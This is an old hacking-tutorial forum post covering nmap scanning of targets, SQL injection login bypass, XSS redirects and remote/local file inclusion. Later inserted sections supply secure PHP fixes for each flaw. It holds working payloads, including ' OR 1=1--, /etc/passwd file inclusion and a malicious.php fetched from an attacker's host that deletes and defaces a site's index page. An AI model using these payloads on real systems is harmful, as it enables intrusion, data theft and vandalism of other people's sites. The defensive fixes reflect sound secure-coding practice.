The Absolute Basics of Hacking
11.25.2009, 6:59 PM
Intro

Hello and welcome to this tutorial. If you see all the text on this page and are afraid, you're not meant to be a hacker; quit now. Also, please know now that, unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers: I will cover how to scan for and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. If you don't know what a word means, Google or Wiki it; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.
Recommended Tools

* Port Scanner - nmap - http://nmap.org/
* Browser - FireFox - http://firefox.com/
Daemon Vulnerabilities

Description

Daemons (also commonly known as services) are the processes that run on a computer and allow it to do things such as serve pages over the HTTP protocol (although they do not always interact over a network). Sometimes these daemons are poorly coded, which allows an attacker to send some sort of input to them that makes them either crash or, in worse cases, run any code the attacker chooses.
Scanning For Vulnerabilities

Well, this is where a little common sense comes in, because we need to answer one question: which ports to scan? With a little googling, we'd know that the default port for the HTTPD (web daemon) is 80, for the FTPD it's 21, etc. So if we wanted to know the version of the HTTPD running on the server, we'd run "nmap targetsite.com -p 80 -sV". NOTICE the -sV argument; it is vital, otherwise nmap will just return whether or not the port is open and won't provide us with the daemon's version. This is great and all, but we don't want to just scan one port at a time, do we? Well, nmap has us covered there: just scan multiple ports by separating each target port with a comma (,) like so: "nmap targetsite.com -p 21,80 -sV". However, if you don't mind the scan taking a while longer, you can scan a range of ports like so: "nmap targetsite.com -p 1-1000 -sV". This will scan all ports between 1 and 1000.
Checking For Vulnerability

After your scan has finished, nmap will display the open ports on your target along with their version (if they were identifiable, which they usually are). An example return would look like this: "80/tcp open http Apache httpd 2.0.32". Taking this information, we search on milw0rm for "Apache". After skimming through the results, we see that the target is vulnerable to this vulnerability, which when run on the target server will make it crash.
Using the Exploits

This varies depending on the language that the exploit is coded in; google how to do this, since it would just be wasting my time to explain how to use all of the different languages here.
Common Web-Script Vulnerabilities

Description

In this section, I will be writing about vulnerabilities in a webserver's server-side code. Here are the topics I will be covering:

* SQL Injection
* XSS (Cross-Site Scripting)
* RFI/LFI (Remote/Local File Include)
SQL Injection

Description

SQL injection is the act of injecting your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: bypass login verification, add a new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database.
Example Vulnerable Code - login.php (PHP/MySQL)

Here's an example of a vulnerable login code:

```php
<?php
// Deliberately vulnerable (as the tutorial describes): the username and
// password are interpolated straight into the SQL string, so whatever the
// client sends becomes part of the query text.
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
    echo("");
} else {
    $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`='$pass'";
    $ret = mysql_query($sql);
    $ret = mysql_fetch_array($ret);
    if ($ret[0] != "") {
        echo("Welcome, $user.");
    } else {
        echo("Incorrect login details.");
    }
}
?>
```
Basically, what this code does is take the username and password input and fetch the user's IP from the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability

Just throw an "'" into the inputs and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection, which anyone can tell you is no fun. Otherwise, it's not injectable.
The Example Exploit

Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement and just let ourselves in. To do this, we would simply put "Administrator" in the username box and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password`='' OR 1=1--'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because, as we all know, the logic of "OR" only requires one condition to be true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' marker for SQL, which means it ignores everything after it; otherwise the last "'" would ruin the syntax and just cause the query to fail.
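The fix is to stop user input from ever becoming part of the SQL text. Below is the same login rebuilt with prepared statements and hashed passwords; this is an added example, not code from the tutorial, and it assumes a PDO connection (placeholder credentials) and a `users` table with `username` and `password_hash` columns.

```php
<?php
// Added example (not from the original tutorial). Assumptions: placeholder
// DSN/credentials below, and a `users` table whose `password_hash` column
// holds password_hash() output rather than plaintext passwords.
$pdo = new PDO('mysql:host=localhost;dbname=app;charset=utf8mb4', 'dbuser', 'dbpass', [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES   => false, // real server-side prepares
]);

function checkLogin(PDO $pdo, string $user, string $pass): bool
{
    // The SQL text is fixed at prepare time; the ? placeholder is bound
    // separately, so a value like ' OR 1=1-- is compared literally against
    // the username column and is never parsed as SQL.
    $stmt = $pdo->prepare('SELECT `password_hash` FROM `users` WHERE `username` = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();          // false when no such user
    return $hash !== false && password_verify($pass, $hash);
}

$user = $_POST['u'] ?? '';
$pass = $_POST['p'] ?? '';

if ($user === '' || $pass === '') {
    echo 'Missing login details.';
} elseif (checkLogin($pdo, $user, $pass)) {
    // Encode on output so a username containing HTML cannot inject markup.
    echo 'Welcome, ' . htmlspecialchars($user, ENT_QUOTES, 'UTF-8') . '.';
} else {
    // Same message for "no such user" and "wrong password".
    echo 'Incorrect login details.';
}
```

With the query structure fixed, the "'" probe from the testing step above produces no SQL error at all; it is just a username that does not exist.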
XSS (Cross-Site Scripting)

Description

This vulnerability allows an attacker's input to be sent to unsuspecting victims. The primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie, they can log into whatever site they stole your cookie from under your account (usually, and assuming you were logged in at the time).
Example Vulnerable Code - search.php (PHP)

```php
<?php
// Deliberately vulnerable (as the tutorial describes): the search term is
// echoed back into the page without any HTML encoding.
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo("You searched for $s. There were no results found");
?>
```
Testing Inputs For Vulnerability

For this, we test by throwing some HTML into the search engine, such as "XSS". If the site is vulnerable to XSS, you will see something like this: XSS; else, it's not vulnerable.
Example Exploit Code (Redirect)

Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=". This will output "You searched for . There were no results found" (HTML), and assuming the target's browser supports JS (JavaScript), which all modern browsers do unless the setting is turned off, it will redirect them to goatse.
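The defence is to HTML-encode the reflected value before it reaches the page, so angle brackets and quotes arrive as text rather than as tags or script. This is an added example, not the tutorial's code; it assumes nothing beyond the `search` query parameter already used above.

```php
<?php
// Added example (not from the original tutorial): search.php with the
// reflected parameter encoded on output.

// Session cookies that JavaScript cannot read blunt the cookie-theft
// scenario from the description even if some other XSS slips through.
ini_set('session.cookie_httponly', '1');

function renderSearch(string $s): string
{
    // <, >, &, " and ' become entities; a <script> tag is shown literally
    // ("&lt;script&gt;") instead of being executed by the browser.
    $safe = htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "You searched for $safe. There were no results found";
}

$s = $_GET['search'] ?? '';
// Declare the charset so the browser decodes the page the same way the
// encoder assumed.
header('Content-Type: text/html; charset=UTF-8');
echo renderSearch($s);
```

Encoding must match the context the value lands in (HTML body here); a value placed inside a JavaScript string or a URL attribute needs that context's encoding instead.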
RFI/LFI (Remote/Local File Include)

Description

This vulnerability allows the user to include a remote or local file and have it parsed and executed on the local server.

Example Vulnerable Code - index.php (PHP)

```php
<?php
// Deliberately vulnerable (as the tutorial describes): the page name from
// the query string is passed straight to include(), so any path or URL the
// client supplies is loaded and executed.
$page = $_GET['p'];
if (isset($page)) {
    include($page);
} else {
    include("home.php");
}
?>
```
Testing Inputs For Vulnerability

Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't, it's not vulnerable to RFI but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI.
Example Exploit

Let's say the target is vulnerable to RFI and we upload the following PHP code to our server:

```php
<?php
// The tutorial's malicious.php: when included by the vulnerable index.php
// it runs on the target server and overwrites its front page.
unlink("index.php");
system("echo Hacked > index.php");
?>
```
If we then view "index.php?p=http://our.site.com/malicious.php", our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
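The fix for both RFI and LFI is to never hand a client-supplied string to include(): map the page name through a fixed allow-list so only known files can be loaded. This is an added example, not the tutorial's code; it assumes the three page files listed under `pages/` exist.

```php
<?php
// Added example (not from the original tutorial): index.php with the page
// parameter resolved through an allow-list. "http://..." and "/etc/passwd"
// are never valid keys, so they never reach include().

// Assumed to exist: pages/home.php, pages/about.php, pages/contact.php
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(?string $p): string
{
    if ($p === null || $p === '') {
        return PAGES['home'];
    }
    // Look the name up rather than trusting it; unknown names fall back
    // to the home page instead of producing a path from the request.
    return PAGES[$p] ?? PAGES['home'];
}

include resolvePage($_GET['p'] ?? null);
```

As defence in depth, keep `allow_url_include` off in php.ini so include() refuses URLs even if a future code path forgets the allow-list.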
Category: Hacking tutorials | Added by: h4ckz0r